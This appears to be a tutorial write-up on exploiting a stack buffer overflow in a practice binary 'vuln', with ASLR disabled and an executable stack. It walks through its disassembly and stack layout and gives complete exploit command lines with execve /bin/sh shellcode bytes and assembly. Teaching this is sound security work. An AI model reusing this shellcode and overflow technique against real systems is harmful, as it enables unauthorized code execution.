vuln
executable. We assume ASLR is disable and the stack is executable.
Download vuln
here.
Just as with any other binary exploitation problem, I suggest running the program with different inputs just to get a feel of what the program is doing.
After running vuln
a couple of times, we might realize that the program doesn't output anything useful about the expected usage, so we can move on at this point.
We start by performing objdump -d vuln > vuln.asm
.
This dumps the program assembly into the vuln.asm
file.
Now we open vuln.asm
to take a look at the main
function, which we can find at address 0x4005ed
. I'll copy the contents below:
00000000004005ed <main>: 4005ed: 55 push %rbp 4005ee: 48 89 e5 mov %rsp,%rbp 4005f1: 48 83 ec 50 sub $0x50,%rsp 4005f5: 89 7d bc mov %edi,-0x44(%rbp) 4005f8: 48 89 75 b0 mov %rsi,-0x50(%rbp) 4005fc: 48 8b 45 b0 mov -0x50(%rbp),%rax 400600: 48 83 c0 08 add $0x8,%rax 400604: 48 8b 00 mov (%rax),%rax 400607: 48 8d 4d c0 lea -0x40(%rbp),%rcx 40060b: 48 8d 55 f8 lea -0x8(%rbp),%rdx 40060f: be 10 07 40 00 mov $0x400710,%esi 400614: 48 89 c7 mov %rax,%rdi 400617: b8 00 00 00 00 mov $0x0,%eax 40061c: e8 cf fe ff ff callq 4004f0 <__isoc99_sscanf@plt> 400621: 89 45 fc mov %eax,-0x4(%rbp) 400624: 83 7d fc 02 cmpl $0x2,-0x4(%rbp) 400628: 74 1b je 400645 <main+0x58> 40062a: 8b 45 fc mov -0x4(%rbp),%eax 40062d: 89 c6 mov %eax,%esi 40062f: bf 16 07 40 00 mov $0x400716,%edi 400634: b8 00 00 00 00 mov $0x0,%eax 400639: e8 82 fe ff ff callq 4004c0 <printf@plt> 40063e: b8 ff ff ff ff mov $0xffffffff,%eax 400643: eb 2f jmp 400674 <main+0x87> 400645: eb 14 jmp 40065b <main+0x6e> 400647: 8b 45 f8 mov -0x8(%rbp),%eax 40064a: 89 c6 mov %eax,%esi 40064c: bf 30 07 40 00 mov $0x400730,%edi 400651: b8 00 00 00 00 mov $0x0,%eax 400656: e8 65 fe ff ff callq 4004c0 <printf@plt> 40065b: 8b 45 f8 mov -0x8(%rbp),%eax 40065e: 3d 94 3a 8f 49 cmp $0x498f3a94,%eax 400663: 75 e2 jne 400647 <<main+0x5a> 400665: bf 54 07 40 00 mov $0x400754,%edi 40066a: e8 41 fe ff ff callq 4004b0 <puts@plt> 40066f: b8 00 00 00 00 mov $0x0,%eax 400674: c9 leaveq 400675: c3 retq
sscanf
and printf
.
Recall that the first argument to a function is stored in the rdi
/edi
register.
We can quickly see that right before the calls to printf
, a constant value (string) is being stored into rdi
.
Since the constant string is unlikely to be user controlled, we can guess that this is not supposed to be a format string attack exploiting printf
.
printf
appears to be uninteresting to us, let's take a look at sscanf
. Before our call to sscanf
, we have a lot of stack manipulation, so this would be a good time to create a stack diagram.
==================== stack grows down main return addr -------------------- <- rbp + 0x8 saved rbp -------------------- <- rbp - 0x0 sscanf return val -------------------- <- rbp - 0x4 integer variable -------------------- <- rbp - 0x8 string buffer -------------------- <- rbp - 0x40 argc -------------------- <- rbp - 0x44 argv ==================== <- rbp - 0x50
rip
is at 0x40061c
(right about to call sscanf
), rdi
contains argv[1]
, rsi
contains some constant string at 0x400710
, rdx
contains some 4-byte variable at rbp - 0x8
, and rcx
contains the pointer to a buffer at rbp - 0x40
.
0x40061c
. When we hit the breakpoint, we can print the string at 0x400710
. Turns out this string is just "%d,%s".
So, the line in assembly will look something like this:
uint32_t sscanf_return_value = sscanf(argv[1], "%d,%s", &integer_variable, &buffer);Continuing with the assembly, we see that the program compares the return value of
sscanf
with 2. If the return value isn't 2, it will print the return value of sscanf
and exit main
.
integer_variable
is equal to 0x498f3a94
, which happens to be 1234123412
in decimal. If it is not equal, it enters an infinite while loop. Otherwise, the program prints something, returns from main
, and exits normally.
sscanf
is copy from (user-controlled) argv[1]
into a fixed-size buffer. Classic buffer overflow!
main
return address with the address of our buffer.
("5,") + (0x38 bytes of shellcode) + (1234123412) + (0xC bytes of padding) + (address of buffer)You might ask yourself why we start with the number
5
instead of 1234123412
. The answer is that sscanf writes into the supplies arguments from left to right. If we overflow the string buffer enough, then we will end up overwriting the integer variable at rbp - 0x8
anyways. As a result, it doesn't matter what we put as the first number, as long as it is a decimal number. The result is that we have to put 1234123412
into our string at the right location.
\x90
s).
sscanf
is called, the rcx
register contains the address of the buffer. We can use gdb to retrieve this address (break on sscanf
, use p/x $rcx
), which on my machine is 0x7fffffffdd50
. This address will be different outside of gdb, but we can continue to test in gdb anyways and adjust this address later.
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x1D + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")When we run this it should work! But...
rip
is at 0x7fffffffdd81
. This is clearly within our buffer, and we can step through the code in assembly to confirm that we got past all the NOPs. We execute the program normally until 0x7fffffffdd81
which is odd.
x/30dx $rip
in gdb) right before we get to the offending address, we see that 0x7fffffffdd81
is opcode 5e, which corresponds to pop rsi
. This is clearly not an illegal instruction, since gdb is able to interpret the opcode. However, once we get to 0x7fffffffdd81
, gdb now interprets the opcode as (bad)
.
rsp
, which is 0x7fffffffdd90
. Additionally, the instruction right before the pop rsi
is push rsp
. The push instruction ends up modifying the next instruction to be executed, and it's clear that rsp
is simply very unluckily placed.
shellcode.asm
. Then at the start of the program, we can add sub rsp, 100
to move rsp
. Our shellcode assembly now looks like this:
; shellcode.asm main: sub rsp, 100 xor eax, eax mov rbx, 0xFF978CD091969DD1 neg rbx push rbx push rsp pop rdi cdq push rdx push rdi push rsp pop rsi mov al, 0x3b syscallWe compile this:
nasm -felf64 shellcode.asm
and then we retrieve the opcodes using objdump: objdump -d shellcode.o
. Our new shellcode ends up being this:
\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05This is 4 bytes longer than the original opcode, so we compensate for that by shortening our NOP slide by 4 bytes. Now this is our final exploit string:
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x19 + '\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")Sure enough, it spawns a shell in gdb.
0x7fffffffdd50
and run it until we get a shell. And that's it!